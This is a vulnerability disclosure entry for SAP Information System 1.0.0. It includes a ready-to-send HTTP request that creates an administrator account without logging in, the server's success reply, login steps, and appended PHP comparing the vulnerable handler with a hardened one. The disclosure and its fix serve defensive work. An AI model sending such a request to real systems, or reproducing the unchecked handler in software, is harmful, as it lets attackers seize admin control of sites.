Submission #34203: SAP Information System 1.0.0 - Improper Authentication (details)

Title: SAP Information System 1.0.0 - Improper Authentication
Description:

Summary: SAP Information System version 1.0.0 suffers from an improper authentication vulnerability that allows a malicious user to create an administrative account without needing to authenticate. The POST request is sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The problem occurs due to lack of session verification in the request.

Steps to Reproduce:

1. Copy this request, change the host and send it to the server:

############################################
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"

hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"

P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"

admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--
############################################

Reply:

############################################
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2022 16:15:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript">setTimeout(function () { swal("Add Admin Successfully!","Message!","success");}, 1000);</script><script type="text/javascript">setTimeout(function(){window.location = "/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>
############################################

2. Go to the login page and enter the hacker:P@ssw0rd! credential. After that you will be logged in with an administrative account.
Source: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html
User: mrempy (UID 24379)
Submitted: 2022-04-05 23:26 (4 years ago)
Moderation: 2022-04-06 04:56 (5 hours later)
Status: Accepted
VulDB entry: 196550 [SAP Information System 1.0 POST Request add_admin.php weak authentication]
Points: 20
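An added illustration of the root cause described in the report, not code from the project or from the submitter: a hypothetical add_admin.php handler in the vulnerable shape (the POST body is trusted with no session check) beside a hardened version that requires an authenticated administrator session, a CSRF token and server-side validation before the account is inserted. The table name, the $_SESSION keys and the $pdo handle are assumptions.

```php
<?php
// Hypothetical reconstruction, NOT the project's actual add_admin.php.
// Assumptions: the login flow stores the authenticated user's id and role in
// $_SESSION['user_id'] / $_SESSION['role'], and $pdo is a configured PDO handle.
session_start();

// VULNERABLE shape (matches the report): the handler trusts the POST body
// alone, so any client that can reach the endpoint can create an admin.
function add_admin_unchecked(PDO $pdo, array $post): bool
{
    $stmt = $pdo->prepare('INSERT INTO admins (username, password, role) VALUES (?, ?, ?)');
    return $stmt->execute([
        $post['username'],
        password_hash($post['password'], PASSWORD_DEFAULT),
        $post['user'], // the client chooses the role
    ]);
}

// HARDENED shape: verify the session before touching the database.
function add_admin_checked(PDO $pdo, array $session, array $post): bool
{
    // 1. Require an authenticated session that holds an administrative role.
    if (empty($session['user_id']) || ($session['role'] ?? '') !== 'admin') {
        http_response_code(403);
        return false;
    }
    // 2. Require a per-session CSRF token, so a logged-in admin's browser
    //    cannot be driven into this request from another origin.
    if (!isset($post['csrf_token'], $session['csrf_token'])
        || !hash_equals($session['csrf_token'], (string) $post['csrf_token'])) {
        http_response_code(403);
        return false;
    }
    // 3. Validate inputs server-side; the role is fixed, never taken from the client.
    $username = trim((string) ($post['username'] ?? ''));
    $password = (string) ($post['password'] ?? '');
    if ($username === '' || strlen($password) < 12) {
        http_response_code(400);
        return false;
    }
    $stmt = $pdo->prepare('INSERT INTO admins (username, password, role) VALUES (?, ?, ?)');
    return $stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT), 'admin']);
}
```

Detection-wise, the vulnerable shape shows up in web server logs as POSTs to controllers/add_admin.php that are not preceded by a successful login from the same session cookie.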
